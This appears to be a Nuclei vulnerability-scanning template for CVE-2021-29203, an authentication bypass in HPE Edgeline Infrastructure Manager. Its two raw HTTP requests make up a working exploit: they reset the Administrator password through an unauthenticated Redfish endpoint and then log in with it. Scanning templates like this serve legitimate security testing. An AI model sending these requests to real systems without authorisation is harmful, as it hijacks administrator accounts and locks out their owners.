62 lines
2.2 KiB
YAML
62 lines
2.2 KiB
YAML
id: CVE-2021-29203
|
|
|
|
info:
|
|
name: HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass
|
|
author: madrobot
|
|
severity: critical
|
|
description: HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.
|
|
remediation: |
|
|
Upgrade to HPE Edgeline Infrastructure Manager version 1.22 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://www.tenable.com/security/research/tra-2021-15
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-29203
|
|
- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn04124en_us
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2021-29203
|
|
cwe-id: CWE-306
|
|
epss-score: 0.95745
|
|
epss-percentile: 0.99222
|
|
cpe: cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: hp
|
|
product: edgeline_infrastructure_manager
|
|
tags: hpe,cve,cve2021,bypass,tenable
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Accept: */*
|
|
Content-Type: application/json
|
|
|
|
{"Password":"{{randstr}}"}
|
|
- |
|
|
POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{"UserName":"Administrator","Password":"{{randstr}}"}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "X-Auth-Token"
|
|
- "PasswordReset"
|
|
- "Location"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Base.1.0.Created"
|
|
|
|
- type: status
|
|
status:
|
|
- 201
|
|
# digest: 4a0a004730450221009fdc153f40f9c5fc1c3a17f7bbdbaf4e35cbc8e5574a6d65224e8ff0d4e0426f02204b18d3057f0f22a1dac71cb14982f352e58f84a225eb4a272e39db17f57435bc:922c64590222798bb761d5b6d8e72950 |